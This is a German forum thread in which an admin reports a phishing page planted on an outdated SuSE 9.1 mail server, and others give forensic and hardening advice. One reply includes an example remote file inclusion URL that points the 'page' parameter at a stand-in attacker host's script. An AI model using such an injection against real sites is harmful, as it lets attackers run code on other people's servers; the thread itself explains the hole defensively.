(Gelöst) Phishing Seite / Server erfolgreich angegriffen

Status
Für weitere Antworten geschlossen.

otternase

New Member
Hallo,

wir haben einen kleinen Server, der für 5 Account Mail abholt

- Kernel 2.6.5 - 7.276 , Suse Linux 9.1
- Squirrelmail
- Open-XChange
- Apache 2.0.49
- php 4.3.4

Der Server hat eine feste IP adresse und (war) bei dyndns verzeichnet.

Nun erhielt ich von unserem Provider eine Mail folgenden Inhalts:

****************

auf Grund von Beschwerden der Firma eBay möchten wir Sie darauf hinweisen, dass am 08.02.2007 von Ihrem o.g. T-DSL Business Account die nachstehende Phisihng Website ins Netz gestellt wurde.

http://*unsere-IP*/SignIn ebay.html

Die Site ist zur Zeit nicht aktiv, wir bitten trotzdem Ihre Systeme zu überprüfen bzw. prüfen zu lassen.

****************

Die Leute hatten Recht. In den Unterverzeichnissen des Servers fanden sich die entsprechenden Dateien. Die SignIn%20ebay.html war allerdings schon verschwunden und die Seite offline.

Leider bin ich kein wirklicher Experte in diesen Dingen. Aber ich frage mich natürlich, wie das denn ging? Auf dem Rechner, der über eine 2. Netzwerkkarte am Internet hängt, lief eine Firewall. Erlaubt war nur http, https und ssh.

In /var/log/messages sind eine Menge fehlgeschlagener Login-Versuche als root zu sehen. In access_log von apache2 sehe ich eine Menge scans nach diversen Skripten (hauptsächlich *.php) und entsprechende Fehler in error.log.

Wie haben diese Buben die Daten auf unseren Server bekommen? Und vor allem: Wie können wir das in Zukunft verhindern?

Unabhängig davon stellen wir gerade auf SME Server 7.1 um, weil das alte System erneuert werden sollte. Nur wird da ja auch ein Webmailer laufen, wohl kein OX mehr für externe Nutzung, dass haben wir zu selten gebraucht.

Gibt es irgendwo Infos über diese Art von Angriffen? Ich vermute, dass lief über php ?

Für hinweise, Literaturtips u.ä. wäre ich dankbar.

Ciao

Rolf
 

Rain_Maker

Administrator
Teammitglied
AW: Phishing Seite / Server erfolgreich angegriffen

otternase schrieb:
Wie haben diese Buben die Daten auf unseren Server bekommen? Und vor allem: Wie können wir das in Zukunft verhindern?
Um ganz vorne anzufangen.

Ab sofort kein OS mehr verwenden, welches nicht mehr vom Distributor mit Sicherheitsupdates versorgt wird, weil der Lebenszyklus abgelaufen ist.

Bei SuSE 9.1 war das vor über 6 Monaten der Fall, also große Schlamperei des Admins, daß das nicht bekannt war bzw. nichts dagegen unternommen wurde.

Welches dann das wirkliche Einfallstor war, ist in Anbetracht dieses Kardinalfehlers sekundär.

Greetz,

RM
 

otternase

New Member
AW: Phishing Seite / Server erfolgreich angegriffen

Hallo,

danke für die rasche Antwort.

Rain_Maker schrieb:
Ab sofort kein OS mehr verwenden, welches nicht mehr vom Distributor mit Sicherheitsupdates versorgt wird, weil der Lebenszyklus abgelaufen ist.

Bei SuSE 9.1 war das vor über 6 Monaten der Fall, also große Schlamperei des Admins, daß das nicht bekannt war bzw. nichts dagegen unternommen wurde.
Ja, ist ja gut. Drum ja auch die Umstellung auf eine neue Maschine.

Mir ist aber keineswegs egal, was dazu führte.

Ciao

Rolf
 

Rain_Maker

Administrator
Teammitglied
AW: Phishing Seite / Server erfolgreich angegriffen

Das ist prinzipiell eine gute Einstellung, ich wollte damit nur ausdrücken, daß es eben um so schwerer wird je mehr potentielle Scheunentore vorhanden sind.

Über 6 Monate keine Sicherheitsupdates sorgten mit Sicherheit für mehrere ungepatchte Lücken, das macht die Suche nicht einfacher.

Man sollte sich folgende Fragen stellen.

1. Welche Dienste liefen?

2. Welche dieser Dienste hatten die letzten 9 Monate Sicherheitsprobleme, die einen entsprechenden exploit ermöglichten?
Dazu wird man auf den Projektseiten nachsehen können.

Das _kann_ (aber muß eben nicht) die Suche eingrenzen.

Hier mal ein Link zur allgemeinen Vorgehensweise.

RootForum.de :: FAQ fuer technische Fragen zu dedizierten Servern - Vorgehensweise bei gecracktem Server

Auch interessant dürfte dieser Artikel sein, der im Linux-Magazin 10/2003 veröffentlicht wurde.

http://www.spenneberg.com/linux-magazin/058-061_sleuthkit2.pdf

Allerdings, je nachdem wie clever die Angreifer waren, wird es sehr schwer etwas herauszufinden.

Eines fällt mir da gerade noch ein:

In /var/log/messages sind eine Menge fehlgeschlagener Login-Versuche als root zu sehen.
Das wird wohl am wenigsten zu bedeuten haben, diese Versuche sind schon so etwas wie "automatisiertes Untergrundrauschen" des WWW.

Skripte, die genau das machen (abscannen ganzer IP-Bereiche und Versuch des ssh-Logins mit ein paar Standardnamen und Standardpasswörtern) gibt es wie Sand am Meer, ein cleverer Angreifer findet andere Wege. Außerdem sollte der direkte ssh-Login als root unterbunden werden und die Authentifikation _NUR_ über Pubkeys erfolgen, dann können solche Skripte eh nichts ausrichten.

Greetz,

RM
 

DerGrosseBaer

New Member
AW: Phishing Seite / Server erfolgreich angegriffen

Ich hatte auch mal so einen Fall. Grund war damals ein unzureichend gesichertes PHP-Script (remote file inclusion) und ein schlampig konfiguriertes PHP (allow_url_fopen = on).

Die Navigation erfolgte so:
Code:
http://www.irgendwo.com/index.php?page=seite2
Der Angreifer konnte sie wie folgt abändern:
Code:
http://www.irgendwo.com/index.php?page=http://www.badboy.net/boeses_script.php
Da damals nicht überprüft wurde, ob der Parameter page auf eine lokale Datei verwies, ... ihr könnt euch vorstellen, was ich meine.

LWN: Remote file inclusion vulnerabilities
 

otternase

New Member
AW: Phishing Seite / Server erfolgreich angegriffen

Hallo,

ich habe immer noch nicht genau rausbekommen, was es denn nun genau war.

Allerdings hat mir das Ganze gehörig Arbeit gemacht. Ich habe:

- die (feste) IP-Adresse des Servers geändert, um aus den Listen der Hacker raus zu sein (danke für den Hinweis an Rain Maker)

- den dyndns-account gelöscht, die ip muss in Zukunft reichen

- ein neues System aufgesetzt und die Emails auf den neuen Server umgezogen

- wir verwenden jetzt SME 7.1 SME Server - Wikipedia

- alle Mailpasswörter beim provider und bei uns geändert

- zugangsdaten dsl geändert

- passwörter des linux-systems neu generiert

- dmz, router hat nur https geöffnet, rest ist zu

- einziger zugang zum server ist der zum horde-webmailer via https, den brauchen wir

.... habe ich noch was vergessen?

... genau: der server schaut täglich automatisiert nach updates :)

Ciao

Rolf
 
Status
Für weitere Antworten geschlossen.
Oben